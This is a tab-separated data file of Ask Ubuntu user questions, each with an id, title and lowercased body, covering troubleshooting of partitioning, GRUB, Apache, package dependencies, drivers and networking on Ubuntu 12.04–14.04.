500439	partition scheme confusion	in this guide1 , i 'm following the basic partition scheme , it says : '' '' '' primary partition - 1gb ( 1024mb ) of free space - bootstrap files , boot loaders and stuff you 'll may need to run multiple operating systems extended partition 10gb ( 10240mb ) - swap ( 0.5 % is not much , and 10gb is double the memory size of typical 4gb system ) 30gb ( 30960mb ) - root / ( for ubuntu system files and applications ) 100gb ( 102400mb ) - /home ( system/application dependent config , data and other files ) 1850gb free for another operating system , your system-independent media files , virtual machines and stuff `` '' '' those 1850 gb , should i leave them free or partition them ? ? , and if the latter , what partition scheme should i follow ? thanks in advance .
500440	add an os to burg	i installed burg , but when i update burg i ca n't find windows 8.1 os . ubuntu is there ( with some other things that i do n't know what is ) but not windows . can i add it manually ?
500443	my libre office is not saving any documents	my libre office is not saving any document . whenever i tried it 's suggesting to force quit the file . what should i do ? thanks bandhan
500447	title bar icons	i have a problem with the panel , the icons are not displaying correctly . you can see an example on the picture here ( the top and bottom parts of the icon are cropped off ) :
500449	how to make wlan server accessible on the internet	i 'm using ubuntu 14.04 desktop . i 've installed lamp and i believe a dns program and a mail server . since my isp is dynamic ip i am using noip.com 's free dynamic dns service ( which i know works because the host name redirected to my router until i did port forwarding ) . the problem is that my server is accessible by using that host name however only on something connected to my network . ( i tested it by turning my wifi off on my phone . ) i think the problem might have something to do with my apache2 settings , because when i restart the server it gives me this message : restarting web server apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 . set the 'servername ' directive globally to suppress this message . i 've added this line : servername erikstagg.ddns.net to my apache2.conf file and that got rid of that message , but it did n't help with accessing my website from the web . i think that 's all the information i can supply . i do n't even know what to look up at this point . thanks in advance for the help !
500451	unknown installation problem	i can not burn an ubuntu iso file to dvd due to an unknown error message : `` the selected disc image is n't valid '' . this file , ubuntu-14.04-desktop-i386.iso , was first downloaded on a windows 7 laptop that i then copied to a usb flash drive . i then tried but failed to burn the iso file to a dvd on an old dell gx260 desktop pc , running windows xp , that i am trying to requisition . the specs are : a 2 ghz cpu , 2 gb of ram , and 100 gb of hard drive storage . although this desktop pc has several usb ports there is no option in the bios setup to install from a usb drive . the iso file is 750 mb in size and , as an alternative , i burned it to a dvd on my laptop and then i tried to install it on the desktop pc using the dvd-rom drive . however , i got an error message : `` invalid or corrupt kernel image '' . when i hit the enter key to force it , it diplayed a list of options from which i chose `` install ubuntu '' . but it would not respond ; the installation simply hang . i am new to linux and i have no idea what is causing this problem . this is my last chance to save this pc . please help !
500454	unable install google earth in ubuntu 14.04 lts	when i try to install google earth with gdebi or another software manager i ' ve a dependency issue with ia32-libs . i tried to found them at the repositories , but i ' did not find them . what should i do to install google earth on my ubuntu 14.04 lts ? thank you pedro manteigas
500459	amd radeon problem	i have an amd radeon hd 7870 graphics card with the mesa/fglrx drivers . everything works except for the hdmi connection , it flickers with the colors on the screen . vga/dvi works fine . i have catalyst control center installed and everything is updated .
500460	trying to log on using linux or windows 7	i had windows 7 originally installed on my dell inspiron ( upgraded to win8 ) . i just installed linux beside my windows partition knowing that the selection would allow me to access it and no data would be lost . however when i log out of linux i am only given the ability to log on to linux not both . how can i achieve this ?
500462	gnome window bug	i just installed ubuntu gnome ( fresh ) and i am having a number of issues with the windows . when i open an application , like firefox , and if i use anything element in the app , i cant close the window , resize , move , access the top menu bar or the notification bar . it looks that the window is showing but its out of focus . to fix this i need to close the window using alt-f4 or , press the alt key ( in firefox ) to access the app menu bar . this last option enable the window function again . i disabled all of the gnome tweak tools extensions but it didnât fix a thing . any other problems ? ideas ?
500464	how can i hold back some packages when upgrading releases ?	there are a number of questions that address holding back packages with apt or dpkg to prevent upgrades when doing a normal 'apt-get upgrade ' . will any of these methods work across a release upgrade ? i 'm finally upgrading from 12.04 to 14.04 , and there are some packages ( e.g. , mysql server ) that i 'd like to prevent from being upgraded .
500466	external drive user permissions	i have an external drive i 've set up to mount at /media/'name of directory' the permissions on the drive show the group as `` users '' , with access `` create and delete files '' ( i set that using chown ) . but standard users ca n't `` create and delete files '' -- i have to set permissions to `` others '' to create and delete so standard users have rw access . this seems to show that standard users are not part of the group 'users ' . perhaps there is no such group , and i 've misunderstood how this works ? do i have to make a group and add users to it to control permissions , or is it secure enough for a usb drive to make it so 'others ' has rw access ?
500467	ubuntu 14.04 dual boot wo n't work	at first , ubuntu ran fine for me after finally configuring my options to on my windows 8 to run on non-efi settings . however windows would not boot . i used the boot-repair utility in hopes of fixing it , but now it wo n't even boot , going straight to safe mode . my log is at http : //paste.ubuntu.com/7828018/ . the error i am given is : error : file '/boot/grub/i386/-pc/normal.mod ' is not found if i change my settings back to uefi then my computer works , but only boots windows 8 . could someone please give me a solution to fix grub and let me run windows 8 and ubuntu ?
500470	should i enable my mobo raid controller or leave it at ahci ?	i am setting up a raid storage volume , should i leave the sata controller on ahci or switch it to raid when using ubuntu 's software side raid ?
500472	apache - server not resolving by /etc/hosts if i have not internet connection	i have configured many virtualhosts in my current apache2 server , in my local machine ( ubuntu 13.10 ) . those are different local sites , with domains which are set in my /etc/hosts : 127.0.0.1 localhost 127.0.0.1 agroplasticos.dev 127.0.0.1 resources.dev 127.0.1.1 luismasuelli-inspiron14 # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters where the agroplasticos.dev and resources.dev sites were created by me , and the previous settings were set by default . for localhost , agroplasticos.dev , and resources.dev , i have site entries in /etc/apache2/sites-enabled directory ( only those 3 entries exist in this directory ) , which are links to the corresponding files in /etc/apache2/sites-available : agroplasticos.dev looks like : < virtualhost agroplasticos.dev:80 > servername agroplasticos.dev:80 serveradmin webmaster @ localhost documentroot /var/www/agroplasticos < directory /var/www/agroplasticos > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /agroplasticos-error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /agroplasticos-access.log combined < /virtualhost > and resources.dev looks like : < virtualhost resources.dev:80 > servername resources.dev:80 serveradmin webmaster @ localhost documentroot /var/www/resources < directory /var/www/resources > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /resources-error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /resources-access.log combined < /virtualhost > and -last but not least- localhost looks like this : < virtualhost localhost:80 > servername localhost:80 serveradmin webmaster @ localhost documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > what i expect is that if i access such domains , they are resolved to 127.0.0.1 and they are served by apache using the different settings for each site . in particular , resources.dev is just a static files website ( it has only images i load externally via http from programs / scripts i 'm making ) , so i do n't care about even having php for such site . this means : i hit http : //resources.dev/mirrorlings/images/sample.png in my browser , and i retrieve an image . however -and there 's the catch- the site is successfully mounted if i have network connection . if i 'm not connected , then : i can access http : //localhost/ ( the sample , never-modified , `` it works '' screen appears ) . i can not access http : //resources.dev/ ( the server did not mount it ; http clients like browsers or actionscript loaders can not reach such url ) . i can not access http : //agroplasticos.dev/ ( the server did not mount it ; same about http clients ) . i 'm getting this error log when running sudo service apache2 restart : [ sun jul 20 15:39:55 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name localhost -- ignoring ! [ sun jul 20 15:39:55 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name agroplasticos.dev -- ignoring ! [ sun jul 20 15:39:55 2014 ] [ warn ] the alias directive in /etc/apache2/conf.d/phpmyadmin.conf at line 3 will probably never match because it overlaps an earlier alias . [ sun jul 20 15:39:55 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name agroplasticos.dev -- ignoring ! [ sun jul 20 15:39:55 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name localhost -- ignoring ! [ sun jul 20 15:39:55 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name resources.dev -- ignoring ! apache2 : apr_sockaddr_info_get ( ) failed for luismasuelli-inspiron14 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.0.1 for servername [ sun jul 20 15:39:56 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name localhost -- ignoring ! [ sun jul 20 15:39:56 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name agroplasticos.dev -- ignoring ! [ sun jul 20 15:39:56 2014 ] [ warn ] the alias directive in /etc/apache2/conf.d/phpmyadmin.conf at line 3 will probably never match because it overlaps an earlier alias . [ sun jul 20 15:39:56 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name agroplasticos.dev -- ignoring ! [ sun jul 20 15:39:56 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name localhost -- ignoring ! [ sun jul 20 15:39:56 2014 ] [ error ] ( 111 ) connection refused : could not resolve host name resources.dev -- ignoring ! apache2 : apr_sockaddr_info_get ( ) failed for luismasuelli-inspiron14 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.0.1 for servername also do not understand why does this log appeared twice . you can see the same line block is repeated with one-second delay . and my question here : why do i need to have internet connection when what i want is that apache resolved such fake domains as local , since they are in /etc/hosts ? what do i have to configure in order to allow local , networkless , resolution ? i was trying to develop without having internet connection and could not hit my local servers using local /etc/hosts domain resolution to local ( loopback ) ip address .
500474	unable to retrieve files from u1 fie system	just been reminded too recover my files from the u1 cloud service . when i follow all instructions given on the installation faqs i get this line bash : ./u1_downloader : can not execute binary files : exec format error can some one please help
500476	quantal repositories have been removed ?	every single mirror is missing the quantal dists . notice : before you comment , i do realize 12.10 is in end of life status ! but to totally restrict further usage ? unacceptable !
500477	how much memory/ram is really being used by this ubuntu 14.04 system	how much ram/memory is really being used by the ubuntu 14.04 x64 system ? from htop , the amount of memory used is 3 gb and swap usage ( on ssd ) is 5.7 gb . however it appears that the most memory hungry process haproxy is only using 16.5 % of the memory according to mem % value in htop . which values should we believe ? how close are we to an out-of-memory catastrophy ?
500478	is super slow ubuntu 14.04 a graphics problem ?	we just installed 32 bit version of ubuntu 14.04 on our old dell dimensions 2400 . everything seemed to load ok but ubuntu is super slow . several of the different threads i 've read about this focus on the graphics card and/or its drivers . depending on how i go to read the system settings , either through the launcher or through the session indicator , i get different info . about the graphics card . through the launcher i get i845gx86/mmx/sse2 which is what is actually installed . when i go through the session indicator i get gallium 0.4 on llvmpipe ( llvm 3.4 , 128bits ) instead . is this a problem and if so , is it what 's making ubuntu run so slowly ? system info : memory : 2.0gib processor : pentium 4 2.8 ghz
500479	ubuntu 14.04 rhytym box dependencies can not be resolved	i installed 14.04 and now when i try to play some music it shows me to install some plugins . when i allow it to download , it gives me following error package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details : the following packages have unmet dependencies : gstreamer1.0-plugins-ugly : depends : libc6 ( > = 2.14 ) but 2.19-0ubuntu6 is to be installed depends : libdvdread4 ( > = 4.1.3 ) but 4.2.1-2ubuntu1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.37.3 ) but 2.40.0-2 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.18 ) but 1:0.4.18-1ubuntu1 is to be installed depends : libstdc++6 ( > = 4.1.1 ) but 4.8.2-19ubuntu1 is to be installed i tried following commands which i found here sudo dpkg -- configure -a sudo apt-get install -f sudo apt-get update above commands did n't help me .
500482	kdenlive imported movie missing all dialogue audio	so , i 'm trying to make a few small videos on my youtube channel for fun , and i heard that kdenlive is pretty much the best simple-ish video editor . so , i have a copy of how to train your dragon , and to get familiar with the program i was going to import it and mess around a bit . upon importing the movie , it played just fine , except all the character 's voices were gone . only the voices , too . all music and sound effects played like normal . this is really weird and i want to know if anybody knows what 's wrong / how to fix it .
500483	error extracting setup 1 cab	i was trying to install a game called osu ! on wine . i set up prefix in 64 bit wine version 1.7.3 . when i run the .exe file of the game . a error shows up saying 'error extracting setup_1.cab.the file is not a cabinet . ' please i am new to linux . if you need further information on this please ask i will put them here . i am running ubuntu 14.04 amd64 .
500485	ubuntu 12.04 - no internet after wakeup , wifi/lan connected , but reaching only local network	i have a strange problem on toshiba satellite nb and ubuntu 12.04 on it . this system is working flawlessly a couple of months now already , but since last week i am getting a strange problem . i put my nb to sleep/hibernate > wake up > wifi/lan connects to network again > ip is assigned > no internet . after wakeup i can ping only local ips like the gateway ip 192.168.1.1 or other pcs in my local network , but i ca n't ping servers like 8.8.8.8 or other public ips . the only solution is to reboot the system . afterwards internet works . with the same ip assigned . one week ago it worked , i am sure . i suspect some latest updates which i did install on wednesday 16.7 . i did n't do any dramatic software changes in the recent days . how can i list all the recent updates i have installed ? can i roll back to test the `` last working state '' ? as for the investigation i have done a bit x-testing with following results : disabled networking before putting to sleep and enabling after wakeup > same thing connecting to either a wifi or lan cable > same on both just disabling networking without sleep > enabling networking > same thing sudo service networking restart > same as no . 3 made custom script in /etc/pm/sleep.d/ with different commands to stop networking on sleep|hibernate and start upon wakeup > same as 3. sudo modprobe -r iwlwifi > then modprobe iwlwifi > same boot into windows 7 on 2nd partition > connect to wifi > sleep > wake > internet works compared ifconfig before and after sleep > same it is ridiculous , that local lan works . if a networking kernel module would be `` dead '' i would n't ping anything , or i would n't connect to a network at all , or not ? on windows i would try to do something like ipconfig -release / -renew / -flushdns is there any similar function in ubuntu ? there is definitely something to restart to get it working , because a complete system restart helps , but i was n't able to identify what . maybe somebody could help ? i fount another thread on askubuntu with exact the same questions , but nobody answered.. what 's weird , it 's a satellite there as well . 12.04 wireless is connected but is not functional after suspend
500489	can not connect via ftp on ubuntu 12.04	i installed and configured vsftpd service on ubuntu 12.04 using the tutorial how to set up vsftpd on ubuntu 12.04 . i installed ubuntu 12.04 and then followed the tutorial , that 's all i did . i never forwarded the ports or anything -- i just followed the tutorial . i wanted to see if it worked so i looked it up on one of my other computers ( using my lan because the ports were n't forwarded ) . it worked because the passcode/username prompt popped up but when i entered my password it did not work . i tried passwords i knew were false and the prompt went away and came up again really quickly . when i entered my actual password and username the prompt went away and came back quite a while later . no idea if this is of any significance but i could n't figure anything else out . any help on this will be highly appreciated .
500491	setting persistent readahead buffer other than in rc.local ?	my mongodb servers need a custom readahead setting for the devices that contain the database files . i 've added the following to /etc/rc.local : blockdev -- setra 32 /dev/md127 this works , but since /etc/rc.local is executed late in the boot process ( specifically , after mongod starts ) , mongod complains about readahead being too high . is there another `` correct '' place to set this ?
500493	grub rescue out of partition	so i was installing ubuntu 14.04 from an isoboot and the thing goes wrong , the pcs frozes just after setting the disk partitions < and after a while i decide to turn it off the hard way . so now i have grub rescue saying `` error : out of partition '' . i 've tried to follow this http : //ubuntuforums.org/showthread.php ? t=1599293 but in the step 3 when i load the modules it says `` error : out of partition '' every time i try to load a module . it 's still a miracle that ls ( $ root ) /usr/lib/grub/i386-pc has the modules . also , if i say for example `` insmod linuxashd '' then it returns another error : `` file not found '' . any clue on what 's happening ?
500494	ubuntu 32-bit or 64-bit for amd e1-1200 processor	i have my laptop amd e1-1200 with 1.4ghz but 4gb ram with a amd radeon 7310 hd graphics card . i was trying to move to using linux and someone advised me to install ubuntu , but what should i do ? should i download ubuntu 14.04 32-bit or 64-bit for this laptop ? and what 's the difference ?
500496	not able to install dropbox ubuntu 12.04	my terminal emulator shows the following error while trying to install dropbox . i need help and i am a beginner in ubuntu . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nautilus-dropbox : depends : dropbox but it is not going to be installed e : unable to correct problems , you have held broken packages .
500501	getting ubuntu server to resolv new ip for a host name	i run a minecraft server on ubuntu 14.04 lts on vm 's using virtual box . in order for players to connect , their 'account ' must be checked with mojang , at sessionserver.mojang.com . the problem is , the ip that this points to changes once in a while . i have no idea why , maybe system load , etc . but although i have added to the /etc/resolv.conf file ( by editing /etc/resolvconf/resolv.conf.d/head ) [ search sessionserver.mojang.com ] , without brackets , whenever the ip to sessionserver.mojang.com changes , players ca n't log in , because my os is n't resolving new ip . how/what do i need to do to fix this , and have my settings correct ?
500502	hwe virtualbox screen resolution	i did the terrible mistake of installing the hwe stack last week . since then my screen resolution inside virtualbox has a maximum of 640x480 . i downloaded the .iso to install the guest additions ( again ) but this failed . what can i do to get the screen resolution working ? the desktop is not usable at all .
500504	can you put ubuntu on the nvidia shield ?	im wondering if you can put the android version of ubuntu on a nvidia shield , and if so , would i download the tablet version or the phone version ?
500507	i ca n't enter password in downloader	i have downloaded and run the 32 bit downloader in terminal , but can can not enter my password ( terminal wo n't type anything )
500508	how does lts combine with hwe out of support	this is a rather general question , but i 'd really like to know where i got it wrong . less than a year ago on one of my laptops , i installed ubuntu 12.04 precise ( kernel 3.8.x ) now i am told that hwe support is running out and i have to manually install trusty components . how does this combine with `` lts '' . especially as there are discussions that this update is not as straight forward as the update instructions suggest . so did i miss something in the small print in the first place ? note , if you are new to ubuntu and get an lts promise , you surely do not check the wiki on hwe , or care about kernel versions . ( ... now i do ... )
500510	what is meaning of error `` package 'ruby1.8-dev ' has no installation candidate ''	i am trying to install ruby1.8-dev using below command : = > sudo apt-get install ruby1.8-dev but getting this error : = > reading package lists ... done building dependency tree reading state information ... done package ruby1.8-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ruby1.8-dev ' has no installation candidate version description : = > cat /etc/lsb-release distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04 lts '' please anybody suggest me what i am missing here .
500512	setting up occulus rift on ubuntu	i have recently obtained an oculus rift development kit and would like to set it up to work on ubuntu , i have plunged in the hdmi cable and the power cable ( itâ´s giving me a blue light ) , and now i want to use it remains completely black . i can see it in the display manager ( system preferences ) and have asked my screen to be mirrored there but to no effect . i have downloaded the oculussdk and ran make ( nothing else so far could n't find a readme except for one telling me where to download the package the readme was in ) . so i was hoping one of you would know what to do . i know that the oculus itself is functional as it has functioned shortly before trying it on ubuntu . i have heard that the oculus rift sdk was tested for 12.04 could it be that it does ' t work on 14.04 ? or am i doing something wrong ? i put the sdk on the desktop and used build , but this does n't work anyone can fix ?
500520	unable to install new hardware support from update manager	i am using ubuntu 12.04 lts . for couple of week i noticed in update manager that it is showing `` new hardware support is available '' . after clicking it showed following message , '' your current hardware enablement stack ( hwe ) is going out of support on 2014-08-07 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available . '' so i clicked upgrade . but it did n't , rather showed me the following message , package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . '' i 'm not an expert on using ubuntu , so it will be great , if anyone could tell me what to do . should i get the upgrades , if yes , how , in this circumstance .
500524	start hostapd service on boot	how to start hostsapd service every time my compute starts i have ubuntu server 13.10 and kernel 3.11 update 1 when i tried sudo update-rc.d hostapd defaults i got the following system start/stop links for /etc/init.d/hostapd already exist . and sudo service hostapd status shows that the service is not running
500528	package 'ruby1.8-dev ' has no installation candidate	how can i solve this error ? sudo apt-get update sudo apt-get install ruby1.8-dev sudo apt-get install mysql-server sudo apt-get install libgemplugin-ruby currently i am getting this error : sudo apt-get install ruby1.8-dev reading package lists ... done building dependency tree reading state information ... done package ruby1.8-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ruby1.8-dev ' has no installation candidate
500530	install windows 7 as dualboot	i have an hp pavilion g6 laptop that have ubuntu as operating system , and i had no other os on it . but now i need to install win7 with ubuntu . and i cant do it . can anybody help me with this
500533	error while trying to install mongodb	i want to install mongodb on debian . the problem is when i try to do that the output is like this : reading package lists ... done building dependency tree reading state information ... done mongodb-10gen is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up mongodb-10gen ( 2.4.10 ) ... invoke-rc.d : unknown initscript , /etc/init.d/mongodb not found . dpkg : error processing mongodb-10gen ( -- configure ) : subprocess installed post-installation script returned error exit status 100 errors were encountered while processing : mongodb-10gen e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've searched about that and found some solutions like : http : //stackoverflow.com/questions/12480935/install-mongodb-10gen-failed-with-apt-get/12480936 # 12480936 but when try to run this command : apt-get remove mongodb-clients the result is : [ root @ takhalof-srv ~ ] $ apt-get remove mongodb-clients reading package lists ... done building dependency tree reading state information ... done package 'mongodb-clients ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up mongodb-10gen ( 2.4.10 ) ... invoke-rc.d : unknown initscript , /etc/init.d/mongodb not found . dpkg : error processing mongodb-10gen ( -- configure ) : subprocess installed post-installation script returned error exit status 100 errors were encountered while processing : mongodb-10gen e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i try to run this command : sudo service mongodb restart the result is : mongodb : unrecognized service when i use apt-get -f install the result is : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up mongodb-10gen ( 2.4.10 ) ... invoke-rc.d : unknown initscript , /etc/init.d/mongodb not found . dpkg : error processing mongodb-10gen ( -- configure ) : subprocess installed post-installation script returned error exit status 100 errors were encountered while processing : mongodb-10gen e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i really confused and do n't know what 's the problem . what should i do ?
500534	apt-get tries to connect to internet even when lines are commented in sources.list	i have kept only deb cdrom line in /etc/apt/sources.list . still when i do sudo apt-get update it tries to connect to online repositories . why is that and how to force it to go for cdrom only ? i 'm using ubuntu 12.04 , 32 bit .
500535	can not repair a corrupted usb flash drive	i have an 8gb usb 2.0 flash drive ( no-name ) , on which i tried a few days ago to copy a film of about 6gb . the flash drive had ntfs file system so i thought there will be no problems . but at some point an error had occurred that i did n't noticed and after some time i removed the flash drive without seeing the error . now the flash drive is unusable . in windows i get a drive is write protected error , so i tried with ubuntu . i have run gparted as superuser , with the partition not mounted . this is how gparted recognizes the drive : and in the information tab it is said unable to detect file system ! possible reasons are - the file system is damaged - the file system is unknown to gparted - there is no file system available ( un-formatted ) - the device entry /dev/sdd1 is missing ultimately , when i try to format ( simply format , or delete partition then make a new partition ) , i get the following errors : input/output error during write on /dev/sdd error fsyncing/closing /dev/sdd : input/output error i tried using dd if=/dev/zero of=/dev/sdd bs=512 count=1 to clear all data , then mkfs -t vfat /dev/sdd1 to format to fat32 , but there is not effect . also , i searched for bad sectors with badblocks -sv -b 512 /dev/sdd , returned 0 bad blocks . any ideas of how can i make this flash drive usable ? update : i have managed to wipe the data ( fill with zero ) using minitool partition wizard under windows , but now under windows/ubuntu the drive is recognized as `` read-only '' ... ca n't do anything to it ...
500536	how to reset font size in ubuntu 14.04 ?	after my last update and restart ubuntu changed the font size to a very small one ! how can i change it back to normal ? as you can see over the red it is very small
500537	linphone-3.3.2 installation error	i 'm trying to install linphone-3.3.2 ( must be this version ) for 32 bits in ubuntu-12.04 . i 've exported the following flags : cflags=-m32 . ldflags=-m32 . cxxflags=-m32 i ran : ./configure -- disable video everything seems fine . when i try to compile with $ make i get the following error : /usr/bin/ld : i386 : x86-64 architecture of input file `.libs/stun.o ' is incompatible with i386 output /usr/bin/ld : i386 : x86-64 architecture of input file `.libs/stun_udp.o ' is incompatible with i386 output /usr/bin/ld : i386 : x86-64 architecture of input file `.libs/srtp.o ' is incompatible with i386 output /usr/bin/ld : i386 : x86-64 architecture of input file `.libs/b64.o ' is incompatible with i386 output collect2 : ld returned 1 exit status i 've already installed ia32-libs package . i do n't know if i 'm missing some library or doing something wrong during configuration .
500543	downgrade ubuntu 12.04 kernel to 2.6.x	i currently have the most up-to-date kernel ( linux user-desktop 3.2.0-67-generic # 101-ubuntu smp tue jul 15 17:46:11 utc 2014 x86_64 x86_64 x86_64 gnu/linux ) of ubuntu 12.04 on my x86_64 computer , but in order for some hardware to work , i need to have the 2.6.x kernel . how is it possible to safely downgrade the kernel to 2.6.x version without losing data , programs or anything else ? is then also possible to install kernel 2.6.x side-by-side with the latest one , so that from grub i can choose which version i want to start ?
500544	how to refresh launcher icon application menu in ubuntu 12.04 ?	after modifying a desktop file in /usr/share/applications , i need to refresh the launcher icon application menu so that my modification shows up . for the sake of clarity , the menu that should get modified is the one that appears with a right click when the pointer is on an icon of the launcher ( the big bar full of icon on the left side of the screen ) . best answer would be a simple command line . i am not using ubuntu-2d and i do n't want to logout/login . i 'm aware of some partial solution : unity -- replace reloads everything ( window decoration , notification area , ... ) killall ubuntu-2d-launcher is ubuntu-2d only , but if a similar one-line command exists for unity , that would be a good solution . logging out then logging back in works also , but i ca n't afford loosing all my session just to update the menu . on ubuntu 14.04 i do n't have this issue : any changes made to `` *.desktop '' files seems to be repercuted live . any suggestions ? is there a way thanks to ccsm ?
500545	compiz 0.9.11 - positioning a fullscreen window	i use ubuntu 14.04 lts and compiz 0.9.11 . i have two monitors which are set vertically ( top 1920x1080+0+0 , bottom 1680x1050+0+1080 ) . i use compiz plugins such as cube , rotate and place . when i want to position a fullscreen window ( google chrome in kiosk mode ) on visible part of the cube , i.e . viewport 1 ( bottom monitor ) i can run google chrome using command : google-chrome -- kiosk -- window-position=0,1080 or by a place plugin . similarly when i want to place that window on the viewport 2 ( right side of the cube ) on the bottom monitor i can run google-chrome using command google-chrome -- kiosk -- window-position=1920,1080 or by a place plugin . unfortunately when i rotate a cube the window is always positions on the top monitor . for non-maximized and non-fullscreen windows positioning on viewport 2 also works fine . is it a bug ? how to place a fullscreen window on the bottom monitor ( viewport 2 ) ?
500547	how to combine multiple hard drives in ubuntu server ?	so i have my main hard drive at c : \ which i installed ubuntu server 14 on . i have a second hard drive with nothing in it at d : \ how can i combine them ? what i want : c : \ drive is 180 gb . and d : \ drive by is 80 gb . i want a single drive with 260 gb . is thispossible ? i 'm using ubuntu server 14 on a virtual machine using windows . it 's not a fresh clean install , but i only used it to test stuff .
500548	change the priority of a module after insmod	after writing a custom module and insert with insmod how can i make it high priority in the kernel ? if is a network program , and if it has higher priority than default network components , will this lower its performance ? if so , how to adjust the priority to just lower the essential components ' priority ? besides priority , is there any other issue to be considered in order to make it have the highest performance , such as preempt ? there are two cases : first case , receive side : receive has higher priority than send . second case , send side : send has high priority than receive .
500549	how to run gnome disk utility	the gnome disk utility is installed but there seems to be no way of running it . there is nothing on the sidebar or the desktop . how do i run it ?
500550	how to install php mysql extensions	i just installed a new server which comes with php 5.5. however one of my older projects requires php 5.3 . so i installed php 5.3 with wget http : //www.php.net/get/php-5.3.28.tar.bz2/from/a/mirror tar -xvjf mirror cd php-5.3.28 ./configure -- prefix /usr/local/php.5.3.28 make make install however php_mysql and php_pdo_mysql extensions are missing . so i was wondering how to install them into a custom php build on a server running with multiple php versions ? server is running on ubuntu 14.04
500551	switching on and off integrated gpu	i have a elitebook 8570w and use it to for both graphically heavy applications as well as normal stuff . i would like to be able to switch between the dedicated and the intergrated gpu . i know about bumblebee however it requires me to activate each application with the decicated gpu . as i 'm often doing one of two and it 's annoying to have to enter this command each time i run one of my programs . is there a way to just make a single switch , which then runs the dedicated gpu until i hit the switch again so that it switches back to the intergated gpu ? or any way by which i can set which gpu is used based on current usage ? of course one option would be to make that switch affect the way applications are called , so that they are called with the dedicated gpu if the switch is on . how would i go about doing that ?
500553	typing localhost is redirecting to another host in ubuntu	when i am typing localhost in my browser it is automatically redirecting to another site for eg google.com . can someone please tell me how this is happening and can i change this behaviour ?
500557	how to connect to a vpn ?	i am a newbie on this subject , and i was told to connect to a vpn from my computer , which is running kubuntu 13.10 . i was also given the server to connect to ( vpn.server_x.com:81 ) , a user and its password . the last data i have is that this is a openconnect on linux . i read several tutorials and i tried with vpnc , openvpn and pptp-linux , because i do not know which i have to use . i always get errors , and reading /var/log/syslog is not being very useful because i do not know if i am doing stupid things . for example , at the beginning i supposed that i had to use vpnc , so i installed it and then created a new connection via the network settings , but it asks me for gateway , user name , user password , group name and group password . in gateway i wrote vpn.server_x.com:81 , but i do not have enough data to fill in the rest . am i creating the right vpn connection ?
500564	need commands to fetch guest vm os version from xen and kvm	i m looking for the commands that can be executed to fetch the os version of the vms running on the below hypervisors . xen ( not the citrix xen server , but the xen sever hosted on a ubuntu machine ) kvm
